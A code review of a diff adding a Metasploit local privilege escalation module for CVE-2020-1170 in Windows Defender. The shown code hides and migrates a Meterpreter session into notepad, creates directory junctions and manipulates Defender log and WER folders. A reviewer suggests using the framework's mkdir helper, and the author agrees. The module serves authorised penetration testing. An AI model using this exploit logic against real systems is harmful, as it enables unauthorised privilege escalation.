modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,203 @@
+        return CheckCode::Appears
+      end
+    end
+  end
+
+  def launch_background_injectable_notepad_and_migrate
+    print_status('Launching notepad to continue executing Powershell commands to write to the file without things failing...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
+    process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{process.pid} launched.")
+    session.migrate(process.pid)
+    process.pid
+  rescue Rex::Post::Meterpreter::RequestError
+    # Sandboxes could not allow to create a new process
+    # stdapi_sys_process_execute: Operation failed: Access is denied.
+    print_error('Operation failed. Trying to elevate the current process...')
+    process = client.sys.process.open
+    session.migrate(process.pid)
+    process.pid
+  end
+
+  def make_directory_junction(original_directory, target_directory)
+    print_status('Creating the directory junction...')
+    junction_creation_result = cmd_exec("cmd.exe /C \"mklink /J #{original_directory} #{target_directory}\"")
+    if junction_creation_result =~ /Junction created/
+      print_good('Junction was successfully created!')
+      return 1
+    elsif junction_creation_result =~ /file already exists/ # If the file already exists on the target...
+      return 2
+    else
+      print_error("Directory junction failed. Error code was (#{junction_creation_result['GetLastError']}): #{junction_creation_result['ErrorMessage']}")
+      return -1
+    end
+  end
+
+  def delete_existing_mpcmdrun_file_or_folder
+    result_file_deletion = rm_f('C:\\Windows\\Temp\\MpCmdRun.log.bak') # Then we try to delete it as a file....
+    if result_file_deletion['GetLastError'] != 0 # Aka we failed
+      result_junction_deletion = rm_rf('C:\\Windows\\Temp\\MpCmdRun.log.bak') # And as a directory junction or folder...
+      if result_junction_deletion['GetLastError'] != 0 # Aka we failed...
+        print_error("Looks like the C:\\Windows\\Temp\\MpCmdRun.log.bak file/folder already exists on this target, and we can't delete it.")
+        print_error("Error code (#{result_junction_deletion['GetLastError']}): #{result_junction_deletion['ErrorMessage']}")
+        return false
+      else
+        print_good('Deleted the already existing C:\\Windows\\Temp\\MpCmdRun.log.bak folder on the target successfully!')
+        return true
+      end
+    else
+      print_good('Deleted the already existing C:\\Windows\\Temp\\MpCmdRun.log.bak file on the target successfully!')
+      return true
+    end
+  end
+
+  def move_folders_out_of_wer(temp_dir)
+    relocation_dir = "#{temp_dir}\\" + Rex::Text.rand_text_alpha(6..13)
+    print_status("Making the temp folder which will house the folders that we move out of the WER directory...")
+    make_temp_dir_result = cmd_exec("cmd.exe /C \"mkdir #{relocation_dir}\"")
```

Comment:
`make_temp_dir_result` is not used.

Also, there's a `mkdir` function for this purpose defined in `lib/msf/core/post/file.rb`.

```suggestion
    mkdir(relocation_dir)
```

Reply:
Thanks, changed this up with next commit. Also noticed that I was using a couple other commands where `rename_file` would have been more appropriate for what I was doing, so thanks for pointing this out so I could look into it further :)